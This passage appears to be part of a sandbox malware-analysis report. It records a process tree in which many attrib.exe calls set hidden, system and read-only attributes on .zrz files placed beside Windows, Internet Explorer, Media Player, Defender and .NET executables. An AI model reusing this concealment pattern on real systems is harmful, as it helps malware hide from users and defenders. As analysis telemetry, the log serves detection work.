        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPSideShowGadget.zrz"
        9⤵
        Sets file to hidden
        
        PID:2176
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpshare.zrz"
        9⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows NT\Accessories\wordpad.zrz"
        9⤵
        Sets file to hidden
        
        PID:2700
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Photo Viewer\ImagingDevices.zrz"
        9⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Sidebar\sidebar.zrz"
        9⤵
        Sets file to hidden
        
        PID:1060
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.zrz"
        9⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.zrz"
        9⤵
        
        PID:1576
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.zrz"
        9⤵
        
        PID:2644
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.zrz"
        9⤵
        
        PID:1776
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ExtExport.zrz"
        9⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\iexplore.zrz"
        9⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ielowutil.zrz"
        9⤵
        
        PID:432
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ieinstal.zrz"
        9⤵
        
        PID:2668
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\wab.zrz"
        9⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\WinMail.zrz"
        9⤵
        
        PID:2488
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\wabmig.zrz"
        9⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmlaunch.zrz"
        9⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\setup_wm.zrz"
        9⤵
        
        PID:2364
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\WMPDMC.zrz"
        9⤵
        Views/modifies file attributes
        
        PID:2232
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpconfig.zrz"
        9⤵
        Sets file to hidden
        
        PID:2688
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpenc.zrz"
        9⤵
        
        PID:2956
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmplayer.zrz"
        9⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmprph.zrz"
        9⤵
        
        PID:1204
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows NT\Accessories\wordpad.zrz"
        9⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpshare.zrz"
        9⤵
        Sets file to hidden
        
        PID:2628
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.zrz"
        9⤵
        
        PID:1660
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Sidebar\sidebar.zrz"
        9⤵
        Views/modifies file attributes
        
        PID:2584
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.zrz"
        9⤵
        
        PID:600
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Boot\PCAT\memtest.zrz"
        9⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\CreateDisc\SBEServer.zrz"
        9⤵
        
        PID:2500
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\wow\ehexthost32.zrz"
        9⤵
        Sets file to hidden
        
        PID:2008
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehexthost.zrz"
        9⤵
        
        PID:760
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehmsas.zrz"
        9⤵
        
        PID:2504
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehrec.zrz"
        9⤵
        
        PID:1720
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehprivjob.zrz"
        9⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehrecvr.zrz"
        9⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehsched.zrz"
        9⤵
        
        PID:568
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehshell.zrz"
        9⤵
        
        PID:1100
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehtray.zrz"
        9⤵
        Views/modifies file attributes
        
        PID:2820
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehvid.zrz"
        9⤵
        
        PID:1448
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcGlidHost.zrz"
        9⤵
        
        PID:1820
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\loadmxf.zrz"
        9⤵
        
        PID:2284
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\McrMgr.zrz"
        9⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcspad.zrz"
        9⤵
        
        PID:2340
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcupdate.zrz"
        9⤵
        Sets file to hidden
        
        PID:2920
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\Mcx2Prov.zrz"
        9⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\McxTask.zrz"
        9⤵
        
        PID:2996
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\MediaCenterWebLauncher.zrz"
        9⤵
        Sets file to hidden
        
        PID:2192
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\RegisterMCEApp.zrz"
        9⤵
        
        PID:1988
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\WTVConverter.zrz"
        9⤵
        
        PID:340
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\AppLaunch.zrz"
        9⤵
        Sets file to hidden
        
        PID:2180
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.zrz"
        9⤵
        Views/modifies file attributes
        
        PID:1104
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.zrz"
        9⤵
        Views/modifies file attributes
        
        PID:1576
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.zrz"
        9⤵
        
        PID:2020
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.zrz"
        9⤵
        
        PID:1124
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.zrz"
        9⤵
        
        PID:1776
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.zrz"
        9⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.zrz"
        9⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.zrz"
        9⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.zrz"
        9⤵
        Views/modifies file attributes
        
        PID:2024
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.zrz"
        9⤵
        Views/modifies file attributes
        
        PID:760
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.zrz"
        9⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.zrz"
        9⤵
        
        PID:2416
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.zrz"
        9⤵
        Sets file to hidden
        
        PID:988
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.zrz"
        9⤵
        
        PID:2736
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.zrz"
        9⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.zrz"
        9⤵
        Views/modifies file attributes
        
        PID:1708
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.zrz"
        8⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.zrz"
        8⤵
        Views/modifies file attributes
        
        PID:1576
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\mip.zrz"
        8⤵
        
        PID:1760
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.zrz"
        8⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.zrz"
        8⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.zrz"
        8⤵
        
        PID:2880
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.zrz"
        8⤵
        
        PID:2588
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.zrz"
        8⤵
        
        PID:1188
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\DVD Maker\DVDMaker.zrz"
        8⤵
        
        PID:1312
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iediagcmd.zrz"
        8⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ieinstal.zrz"
        8⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ielowutil.zrz"
        8⤵
        
        PID:2828
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iexplore.zrz"
        8⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MSASCui.zrz"
        8⤵
        Views/modifies file attributes
        
        PID:1360
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MpCmdRun.zrz"
        8⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\Journal.zrz"
        8⤵
        Sets file to hidden
        
        PID:796
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wabmig.zrz"
        8⤵
        
        PID:760
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\WinMail.zrz"
        8⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wab.zrz"
        8⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\PDIALOG.zrz"
        8⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\setup_wm.zrz"
        8⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmlaunch.zrz"
        8⤵
        
        PID:876
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpconfig.zrz"
        8⤵
        
        PID:1124
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPDMC.zrz"
        8⤵
        
        PID:2972
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpenc.zrz"
        8⤵
        
        PID:2252
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmplayer.zrz"
        8⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnetwk.zrz"
        8⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnscfg.zrz"
        8⤵
        
        PID:828
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmprph.zrz"
        8⤵
        
        PID:576
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpshare.zrz"
        8⤵
        Sets file to hidden
        
        PID:2916
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPSideShowGadget.zrz"
        8⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows NT\Accessories\wordpad.zrz"
        8⤵
        Views/modifies file attributes
        
        PID:2392
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Photo Viewer\ImagingDevices.zrz"
        8⤵
        
        PID:2128
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Sidebar\sidebar.zrz"
        8⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.zrz"
        8⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.zrz"
        8⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.zrz"
        8⤵
        
        PID:936
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.zrz"
        8⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ExtExport.zrz"
        8⤵
        
        PID:1360
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ieinstal.zrz"
        8⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\iexplore.zrz"
        8⤵
        
        PID:1908
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ielowutil.zrz"
        8⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\wab.zrz"
        8⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\wabmig.zrz"
        8⤵
        
        PID:1972
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmlaunch.zrz"
        8⤵
        
        PID:876
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\setup_wm.zrz"
        8⤵
        
        PID:1520
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\WinMail.zrz"
        8⤵
        
        PID:1892
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpconfig.zrz"
        8⤵
        
        PID:2676
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\WMPDMC.zrz"
        8⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpenc.zrz"
        8⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmplayer.zrz"
        8⤵
        
        PID:1160
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmprph.zrz"
        8⤵
        
        PID:2852
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpshare.zrz"
        8⤵
        
        PID:1476
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows NT\Accessories\wordpad.zrz"
        8⤵
        Sets file to hidden
        
        PID:2008
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.zrz"
        8⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Sidebar\sidebar.zrz"
        8⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.zrz"
        8⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Boot\PCAT\memtest.zrz"
        8⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\CreateDisc\SBEServer.zrz"
        8⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\wow\ehexthost32.zrz"
        8⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehexthost.zrz"
        8⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehmsas.zrz"
        8⤵
        Sets file to hidden
        
        PID:2348
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehprivjob.zrz"
        8⤵
        
        PID:2640
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehrec.zrz"
        8⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehrecvr.zrz"
        8⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehsched.zrz"
        8⤵
        Views/modifies file attributes
        
        PID:388
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehshell.zrz"
        8⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehtray.zrz"
        8⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehvid.zrz"
        8⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcGlidHost.zrz"
        8⤵
        Sets file to hidden
        
        PID:2820
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\loadmxf.zrz"
        8⤵
        
        PID:1796
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\McrMgr.zrz"
        8⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcspad.zrz"
        8⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcupdate.zrz"
        8⤵
        Sets file to hidden
        
        PID:3000
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\Mcx2Prov.zrz"
        8⤵
        
        PID:368
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\McxTask.zrz"
        8⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\MediaCenterWebLauncher.zrz"
        8⤵
        
        PID:2296
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\RegisterMCEApp.zrz"
        8⤵
        
        PID:1312
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\WTVConverter.zrz"
        8⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.zrz"
        8⤵
        
        PID:2140
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\AppLaunch.zrz"
        8⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.zrz"
